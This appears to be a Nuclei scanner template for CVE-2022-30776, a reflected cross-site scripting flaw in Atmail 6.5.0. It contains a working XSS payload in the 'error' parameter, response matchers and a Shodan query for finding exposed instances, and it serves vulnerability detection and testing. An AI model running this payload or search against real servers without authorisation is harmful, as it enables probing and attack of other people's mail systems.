46 lines
1.2 KiB
YAML
46 lines
1.2 KiB
YAML
id: CVE-2022-30776
|
|
|
|
info:
|
|
name: Atmail 6.5.0 - Cross-Site Scripting
|
|
author: 3th1c_yuk1
|
|
severity: medium
|
|
description: |
|
|
Atmail 6.5.0 contains a cross-site scripting vulnerability via the index.php/admin/index/ 'error' parameter.
|
|
reference:
|
|
- https://medium.com/@bhattronit96/cve-2022-30776-cd34f977c2b9
|
|
- https://www.atmail.com/
|
|
- https://help.atmail.com/hc/en-us/sections/115003283988
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2022-30776
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
|
cvss-score: 6.1
|
|
cve-id: CVE-2022-30776
|
|
cwe-id: CWE-79
|
|
metadata:
|
|
shodan-query: http.html:"atmail"
|
|
verified: "true"
|
|
tags: cve,cve2022,atmail,xss
|
|
|
|
requests:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/atmail/index.php/admin/index/?error=1%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- "Error: 1<script>alert(document.domain)</script>"
|
|
|
|
- type: word
|
|
part: header
|
|
words:
|
|
- text/html
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
|
|
# Enhanced by mp on 2022/09/14
|